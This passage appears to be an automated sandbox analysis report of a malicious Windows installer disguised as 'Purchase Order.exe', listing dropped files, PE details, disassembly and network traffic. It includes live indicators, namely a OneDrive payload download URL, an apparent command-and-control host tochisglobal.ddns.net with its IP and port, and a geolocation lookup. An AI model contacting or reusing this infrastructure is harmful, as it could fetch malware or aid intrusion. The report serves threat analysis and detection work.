                                                        SHA-256:C2BD4688C907E952A30409CC0FE01BE992B9B3EB7A8E7482855E1704AEEBF8FC
                                                        SHA-512:DFCBBD2A67D96AE8FA4BA3374880772F52C0B14CF80D1D2FF1E5609994146E3BB879E27366DB9C77DDEE67DED3070CDCB06C1A4303B99CB881566DF953410C71
                                                        Malicious:false
                                                        Preview:...//....7.............%.L......jj........................**...............a....55.(.......`.X.................. ...AAA...............0................AAAA...........X..........r.k..ZZZZ.....,,.......h...............\\.QQ......".DD...d................~~.u......h.XX.A.................v......XX........^^..W......................KKKKKKKKK.#..........22.VVVVV..............J....@@@...LL...........................rr......ggggg..............................[[[..DD..........................................W.........................q.....pppp......W........,,,,...CC.&&..........g...|||...............JJJ.........!!....ooo....*........................?..R.....O...................:............!!.../..4.U.........T...................&...........J.................''..@........]...LL....X...............~~......... ....&&&.......&&.......................F..........8................c.........s................(...QQQ...............;;...**.......VVV...........L................].................\........

                                                        C:\Users\user\AppData\Local\potentially\Avantgarders\pupfish.ope

                                                        Download File
                                                        Process:C:\Users\user\Desktop\Purchase Order.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):323310
                                                        Entropy (8bit):0.1590287823589042
                                                        Encrypted:false
                                                        SSDEEP:384:BJ+9Y0WGqEqiQ5th06IJhE5eFnOR8VuD9DtnNYzhF:G6b8Aq
                                                        MD5:95E317BA14F87FBB97BC0DF53515A13E
                                                        SHA1:E02E59691C7EB6223B8D44230B3A304BC913328C
                                                        SHA-256:BD111067FBB3A820F40605AD6BC7A12362D49AA74DFE7F834CA374E94BDDC6AF
                                                        SHA-512:BC23A4C81BFAB13032E9E5930AD12AA0C1F05D363219BFB56B966B2F040E6FD843585E416E1E70A2373B3D1C844155B06E6AD2FEBFD238193DD7BB1D04BFA424
                                                        Malicious:false
                                                        Preview:......................................................................................................................................................................................................................................................................................................................................................................................................................................................................./.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h..........................................................

                                                        C:\Users\user\AppData\Local\potentially\Avantgarders\redeyes.skr

                                                        Download File
                                                        Process:C:\Users\user\Desktop\Purchase Order.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):283572
                                                        Entropy (8bit):0.15868574660676088
                                                        Encrypted:false
                                                        SSDEEP:384:0rGOeN3Ba/V0pYYikHg+zEuSpPzyFLnfyytTBt:W8aN0VBYprirR
                                                        MD5:73FE342DC28D471033C8BAE7496862E4
                                                        SHA1:2C9929F233A5677A41425E2F17893E76B4C2E166
                                                        SHA-256:D90BF06CC1B915E36C02581F7BBB3B4BA29F86AA5FD657847AA6C4A17D764DDE
                                                        SHA-512:9695030A3330DCAA69B3C6EF6C4C9D71B8711D3EE06FA712769E5B37AC14F1300A4DB2A3DD6ECEA328308ACED99D33B28BE79E33F1470A04B5E6BCCCF1BFDDD3
                                                        Malicious:false
                                                        Preview:..........................................................................................................................................................................................................................W..................................................................................................................................................................................*.....................R...................................................................................................................................................................................................................................................................................................................k.....................................................................................................................................................................................................m..........................................................................

                                                        C:\Users\user\AppData\Local\potentially\Avantgarders\shamefaced.sym

                                                        Download File
                                                        Process:C:\Users\user\Desktop\Purchase Order.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):115812
                                                        Entropy (8bit):0.15848441031298327
                                                        Encrypted:false
                                                        SSDEEP:48:lWhD2COv9WF02C4QVsAbMbymyOaWkkraIDrpAFpw+v:lWh2XelCxsAobMWkk2+pSpFv
                                                        MD5:B137686867BBB8B14FD33FB386AE6B1B
                                                        SHA1:C92A2EA50F6E56CD52380E49202DADFDA66CA4AA
                                                        SHA-256:DB772C54087D43112B92C0A06D83DDA60F9A4626D6144229CE7A5AAB5CEFD1A6
                                                        SHA-512:7FBBE4BFB4B24F1EAE0E4D2BF07A12CCDEFC8959AF08D85B88B350E5FA0F0DB85F1B3B457C5AB511BEC30975659FDF3332DFD4C23D661A3C47586B6DF7DFC22E
                                                        Malicious:false
                                                        Preview:.............................................................................................................................................x.r...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................5......................................................................o..........................................................................................................................................................................D..........................................................................................................................................

                                                        C:\Users\user\AppData\Local\potentially\Avantgarders\temperamented.txt

                                                        Download File
                                                        Process:C:\Users\user\Desktop\Purchase Order.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):379
                                                        Entropy (8bit):4.273007664169869
                                                        Encrypted:false
                                                        SSDEEP:6:o4wKuOetVqxI9NBN2RGE7oL9VxZhGhuzXer5MmybqCkIhwHM+:P/uOetIxI9R2RviPZb7erBJCkWSj
                                                        MD5:3013D03832E464117D1C632297416EC8
                                                        SHA1:97B3B4BDD9D5ED938856A7302E113AB75F3E0592
                                                        SHA-256:689DC1B4EB7F689FDF50574C78CDADDE2D77DD9F6CA02596DD46008D960A3BAA
                                                        SHA-512:6F92BCD321EDAB62F030541C4F08359258C028223F2A30DDFB52322800425992C17571EB789CDAE4E7242ED784E3D14E4F9B5A55DFE5BD3E90BF12559AE273D9
                                                        Malicious:false
                                                        Preview:probere sydover cannabisens humpendes tupanship utriculariaceae..natbordsskuffers amortization clasped nonruinously rusgift sulphazotize ruinatious..ndsignaler unbeloved gruedes nonliteracy modefolkenes..sstjernerne runden scribbling frdselslreres pulverisers petara..snurrige overblow talker ferri statusoptllingen undeniableness,nonpaid mongreldom bundgarnenes gudruns sarcina.

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.278907180417852
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:Purchase Order.exe
                                                        File size:580'232 bytes
                                                        MD5:996cd1a4008e0fca3750e9524bd13a9d
                                                        SHA1:f202d20579ba03acb804f651bf66e2ab47add4c8
                                                        SHA256:00473ae2a9e945343456d0193e1a5fe58c71776f42e747249a3c435b8ce7e1bb
                                                        SHA512:8b71beb452cb4f03f6e9fc897ec1164f5ec8e547d3c6ee57ab5c07cca22d5cd71371f8dee45cb63e7bec838dc4b30b34a187b5e81439b3e71553b35a71f9e7b2
                                                        SSDEEP:12288:ja+TesAUQUC4Mpx3Y1JbSd+xQgVN9pmdVepFq:28esAfUPGI1h3RHY8rq
                                                        TLSH:30C402F96B597916CB900B754873C6351232AD45AF704B0F2FE8B53A3BF10B78903A69
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....c.W.................`...|.....

                                                        File Icon

                                                        Icon Hash:cf3144507064318f

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x40310f
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x5795639A [Mon Jul 25 00:55:54 2016 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de

                                                        Authenticode Signature

                                                        Signature Valid:false
                                                        Signature Issuer:E=Bankdirektoer@Forbindsstoffers.Nu, O=Allegorisxur, OU="lampshell lossende Unvistaed ", CN=Allegorisxur, L=Harou\xe9, S=Grand Est, C=FR
                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                        Error Number:-2146762487
                                                        Not Before, Not After
                                                        • 01/11/2023 04:33:53 31/10/2026 04:33:53
                                                        Subject Chain
                                                        • E=Bankdirektoer@Forbindsstoffers.Nu, O=Allegorisxur, OU="lampshell lossende Unvistaed ", CN=Allegorisxur, L=Harou\xe9, S=Grand Est, C=FR
                                                        Version:3
                                                        Thumbprint MD5:BBCFE93B54A681175BE69A09168D3B9E
                                                        Thumbprint SHA-1:248713EDBC6E4D4E717F3CDF8B01D51BFBCEB38F
                                                        Thumbprint SHA-256:1F9293305E8A416424382F27ED18698557856AB70F1DAE171DC01B8A160E3354
                                                        Serial:5F6701B5EE17D55029DA4372E8A98347A5966E5C

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+18h], ebx
                                                        mov dword ptr [esp+10h], 00409198h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [004070A8h]
                                                        call dword ptr [004070A4h]
                                                        cmp ax, 00000006h
                                                        je 00007F6C34561C93h
                                                        push ebx
                                                        call 00007F6C34564C01h
                                                        cmp eax, ebx
                                                        je 00007F6C34561C89h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 00407298h
                                                        push esi
                                                        call 00007F6C34564B7Dh
                                                        push esi
                                                        call dword ptr [004070A0h]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], bl
                                                        jne 00007F6C34561C6Dh
                                                        push ebp
                                                        push 00000009h
                                                        call 00007F6C34564BD4h
                                                        push 00000007h
                                                        call 00007F6C34564BCDh
                                                        mov dword ptr [0042E404h], eax
                                                        call dword ptr [00407044h]
                                                        push ebx
                                                        call dword ptr [00407288h]
                                                        mov dword ptr [0042E4B8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 00428828h
                                                        call dword ptr [00407174h]
                                                        push 00409188h
                                                        push 0042DC00h
                                                        call 00007F6C345647F7h
                                                        call dword ptr [0040709Ch]
                                                        mov ebp, 00434000h
                                                        push eax
                                                        push ebp
                                                        call 00007F6C345647E5h
                                                        push ebx
                                                        call dword ptr [00407154h]

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x75340xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x490000x31fa8.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x8d0300xa58
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x5fdd0x600038462d04cfdbc4943d18be461d53cc3eFalse0.6783854166666666data6.499697507009752IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x70000x13520x14003d134ae5961af9895950a7ee0adc520aFalse0.4583984375data5.207538993430304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0x90000x254f80x6002d00401e0c64d69b6d0ccb877d9f624eFalse0.4544270833333333data4.0323505938358934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x2f0000x1a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x490000x31fa80x320003d2d7fb4b8b6f96646c1ee96d192964dFalse0.4782080078125data5.276916225410081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x493b80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.30484739145865375
                                                        RT_ICON0x59be00x9958PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9979366211534543
                                                        RT_ICON0x635380x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.37352848433886904
                                                        RT_ICON0x6c9e00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.38803142329020335
                                                        RT_ICON0x71e680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3819674067076051
                                                        RT_ICON0x760900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4515560165975104
                                                        RT_ICON0x786380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4971857410881801
                                                        RT_ICON0x796e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5713114754098361
                                                        RT_ICON0x7a0680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6312056737588653
                                                        RT_DIALOG0x7a4d00x144dataEnglishUnited States0.5216049382716049
                                                        RT_DIALOG0x7a6180x120dataEnglishUnited States0.5104166666666666
                                                        RT_DIALOG0x7a7380x11cdataEnglishUnited States0.6056338028169014
                                                        RT_DIALOG0x7a8580xc4dataEnglishUnited States0.5918367346938775
                                                        RT_DIALOG0x7a9200x60dataEnglishUnited States0.7291666666666666
                                                        RT_GROUP_ICON0x7a9800x84dataEnglishUnited States0.7348484848484849
                                                        RT_VERSION0x7aa080x25cdataEnglishUnited States0.5149006622516556
                                                        RT_MANIFEST0x7ac680x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153

                                                        Imports

                                                        DLLImport
                                                        KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                        USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                        ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 13, 2024 06:04:02.902920008 CEST49713443192.168.2.513.107.137.11
                                                        May 13, 2024 06:04:02.902965069 CEST4434971313.107.137.11192.168.2.5
                                                        May 13, 2024 06:04:02.903043032 CEST49713443192.168.2.513.107.137.11
                                                        May 13, 2024 06:04:02.912241936 CEST49713443192.168.2.513.107.137.11
                                                        May 13, 2024 06:04:02.912257910 CEST4434971313.107.137.11192.168.2.5
                                                        May 13, 2024 06:04:03.434931040 CEST4434971313.107.137.11192.168.2.5
                                                        May 13, 2024 06:04:03.435121059 CEST49713443192.168.2.513.107.137.11
                                                        May 13, 2024 06:04:03.479645967 CEST49713443192.168.2.513.107.137.11
                                                        May 13, 2024 06:04:03.479669094 CEST4434971313.107.137.11192.168.2.5
                                                        May 13, 2024 06:04:03.479898930 CEST4434971313.107.137.11192.168.2.5
                                                        May 13, 2024 06:04:03.480335951 CEST49713443192.168.2.513.107.137.11
                                                        May 13, 2024 06:04:03.482693911 CEST49713443192.168.2.513.107.137.11
                                                        May 13, 2024 06:04:03.524121046 CEST4434971313.107.137.11192.168.2.5
                                                        May 13, 2024 06:04:04.432444096 CEST4434971313.107.137.11192.168.2.5
                                                        May 13, 2024 06:04:04.432513952 CEST4434971313.107.137.11192.168.2.5
                                                        May 13, 2024 06:04:04.432519913 CEST49713443192.168.2.513.107.137.11
                                                        May 13, 2024 06:04:04.432557106 CEST49713443192.168.2.513.107.137.11
                                                        May 13, 2024 06:04:04.435972929 CEST49713443192.168.2.513.107.137.11
                                                        May 13, 2024 06:04:04.436001062 CEST4434971313.107.137.11192.168.2.5
                                                        May 13, 2024 06:04:07.066996098 CEST497156426192.168.2.5103.253.17.222
                                                        May 13, 2024 06:04:07.413810015 CEST642649715103.253.17.222192.168.2.5
                                                        May 13, 2024 06:04:07.413924932 CEST497156426192.168.2.5103.253.17.222
                                                        May 13, 2024 06:04:07.416974068 CEST497156426192.168.2.5103.253.17.222
                                                        May 13, 2024 06:04:07.802228928 CEST642649715103.253.17.222192.168.2.5
                                                        May 13, 2024 06:04:07.844105005 CEST497156426192.168.2.5103.253.17.222
                                                        May 13, 2024 06:04:08.191034079 CEST642649715103.253.17.222192.168.2.5
                                                        May 13, 2024 06:04:08.213608980 CEST497156426192.168.2.5103.253.17.222
                                                        May 13, 2024 06:04:08.610280991 CEST642649715103.253.17.222192.168.2.5
                                                        May 13, 2024 06:04:08.610366106 CEST497156426192.168.2.5103.253.17.222
                                                        May 13, 2024 06:04:09.016627073 CEST642649715103.253.17.222192.168.2.5
                                                        May 13, 2024 06:04:09.109905005 CEST642649715103.253.17.222192.168.2.5
                                                        May 13, 2024 06:04:09.156639099 CEST497156426192.168.2.5103.253.17.222
                                                        May 13, 2024 06:04:09.503473997 CEST642649715103.253.17.222192.168.2.5
                                                        May 13, 2024 06:04:09.547689915 CEST497156426192.168.2.5103.253.17.222
                                                        May 13, 2024 06:04:09.726208925 CEST497156426192.168.2.5103.253.17.222
                                                        May 13, 2024 06:04:09.930118084 CEST4971680192.168.2.5178.237.33.50
                                                        May 13, 2024 06:04:10.128483057 CEST642649715103.253.17.222192.168.2.5
                                                        May 13, 2024 06:04:10.236584902 CEST8049716178.237.33.50192.168.2.5
                                                        May 13, 2024 06:04:10.236665010 CEST4971680192.168.2.5178.237.33.50
                                                        May 13, 2024 06:04:10.237616062 CEST4971680192.168.2.5178.237.33.50
                                                        May 13, 2024 06:04:10.548712969 CEST8049716178.237.33.50192.168.2.5
                                                        May 13, 2024 06:04:10.548789024 CEST4971680192.168.2.5178.237.33.50
                                                        May 13, 2024 06:04:10.566118002 CEST497156426192.168.2.5103.253.17.222
                                                        May 13, 2024 06:04:10.956862926 CEST642649715103.253.17.222192.168.2.5
                                                        May 13, 2024 06:04:11.547836065 CEST8049716178.237.33.50192.168.2.5
                                                        May 13, 2024 06:04:11.547904968 CEST4971680192.168.2.5178.237.33.50
                                                        May 13, 2024 06:04:12.437547922 CEST642649715103.253.17.222192.168.2.5
                                                        May 13, 2024 06:04:12.439389944 CEST497156426192.168.2.5103.253.17.222
                                                        May 13, 2024 06:04:12.842987061 CEST642649715103.253.17.222192.168.2.5
                                                        May 13, 2024 06:04:42.450043917 CEST642649715103.253.17.222192.168.2.5
                                                        May 13, 2024 06:04:42.451807976 CEST497156426192.168.2.5103.253.17.222
                                                        May 13, 2024 06:04:42.858130932 CEST642649715103.253.17.222192.168.2.5

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 13, 2024 06:04:02.742290974 CEST5448753192.168.2.51.1.1.1
                                                        May 13, 2024 06:04:04.445508957 CEST5045753192.168.2.51.1.1.1
                                                        May 13, 2024 06:04:06.893347979 CEST5498953192.168.2.51.1.1.1
                                                        May 13, 2024 06:04:07.066059113 CEST53549891.1.1.1192.168.2.5
                                                        May 13, 2024 06:04:09.768071890 CEST5153453192.168.2.51.1.1.1
                                                        May 13, 2024 06:04:09.924969912 CEST53515341.1.1.1192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        May 13, 2024 06:04:02.742290974 CEST192.168.2.51.1.1.10xd937Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                        May 13, 2024 06:04:04.445508957 CEST192.168.2.51.1.1.10xa437Standard query (0)kxwbha.am.files.1drv.comA (IP address)IN (0x0001)false
                                                        May 13, 2024 06:04:06.893347979 CEST192.168.2.51.1.1.10x44dcStandard query (0)tochisglobal.ddns.netA (IP address)IN (0x0001)false
                                                        May 13, 2024 06:04:09.768071890 CEST192.168.2.51.1.1.10xb14dStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        May 13, 2024 06:04:02.896969080 CEST1.1.1.1192.168.2.50xd937No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                        May 13, 2024 06:04:02.896969080 CEST1.1.1.1192.168.2.50xd937No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                        May 13, 2024 06:04:02.896969080 CEST1.1.1.1192.168.2.50xd937No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        May 13, 2024 06:04:02.896969080 CEST1.1.1.1192.168.2.50xd937No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                        May 13, 2024 06:04:02.896969080 CEST1.1.1.1192.168.2.50xd937No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                        May 13, 2024 06:04:04.655276060 CEST1.1.1.1192.168.2.50xa437No error (0)kxwbha.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                        May 13, 2024 06:04:04.655276060 CEST1.1.1.1192.168.2.50xa437No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                        May 13, 2024 06:04:07.066059113 CEST1.1.1.1192.168.2.50x44dcNo error (0)tochisglobal.ddns.net103.253.17.222A (IP address)IN (0x0001)false
                                                        May 13, 2024 06:04:09.924969912 CEST1.1.1.1192.168.2.50xb14dNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • onedrive.live.com
                                                        • geoplugin.net

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549716178.237.33.50806008C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe
                                                        TimestampBytes transferredDirectionData
                                                        May 13, 2024 06:04:10.237616062 CEST71OUTGET /json.gp HTTP/1.1
                                                        Host: geoplugin.net
                                                        Cache-Control: no-cache
                                                        May 13, 2024 06:04:10.548712969 CEST1173INHTTP/1.1 200 OK
                                                        date: Mon, 13 May 2024 04:04:10 GMT
                                                        server: Apache
                                                        content-length: 965
                                                        content-type: application/json; charset=utf-8
                                                        cache-control: public, max-age=300
                                                        access-control-allow-origin: *
                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 31 30 31 2e 36 31 2e 32 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                        Data Ascii: { "geoplugin_request":"191.101.61.26", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.54971313.107.137.114436008C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-05-13 04:04:03 UTC271OUTGET /download?resid=7EB674A88CCF381D%21539&authkey=!AJYql7taWUIXlaI HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: onedrive.live.com
                                                        Cache-Control: no-cache
                                                        Cookie: MUID=02A1F39C44B160352D6AE03C40B16444
                                                        2024-05-13 04:04:04 UTC1180INHTTP/1.1 302 Found
                                                        Cache-Control: no-cache, no-store
                                                        Pragma: no-cache
                                                        Content-Type: text/html
                                                        Expires: -1
